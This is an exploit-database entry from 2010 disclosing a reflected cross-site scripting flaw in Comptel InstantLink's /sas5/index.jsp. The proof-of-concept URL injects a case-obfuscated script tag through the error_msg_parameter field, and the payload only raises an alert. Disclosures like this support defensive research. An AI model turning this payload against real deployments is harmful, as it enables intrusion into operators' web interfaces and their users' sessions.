Comptel InstantLink XSS vulnerability

2010-02-26T00:00:00
ID 1337DAY-ID-11093
Type zdt
Reporter thebluegenius
Modified 2010-02-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================
Comptel InstantLink XSS vulnerability
=====================================

--------------------------------------------------------------------
# Exploit Title: Comptel InstantLink" XSS vulnerability
# Date: 24 Feb 2010
# Author: thebluegenius
# Software Link: http://www.comptel.com/ProvisioningActivation/
# Version: All
# CVE : NA

---------------------------------------------------
"Comptel InstantLink" XSS vulnerability.
---------------------------------------------------

Product Name: Comptel Instant Link System
Vendor      :http://www.comptel.com/ProvisioningActivation/

Description:

Comptel InstantLink automates the user provisioning and service activation processes. It covers the entire provisioning workflow - from order entry to billable service.

The product suffers from XSS vulnerability. Presently this product is deployed to over 280 Telecom customers with 800+ million subscribers across the world.

------------------
Vulnerability: XSS
------------------
you can execute XSS as given below:
http://IPaddress:port/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E

-----------------------------------------------------




#  0day.today [2018-04-09]  #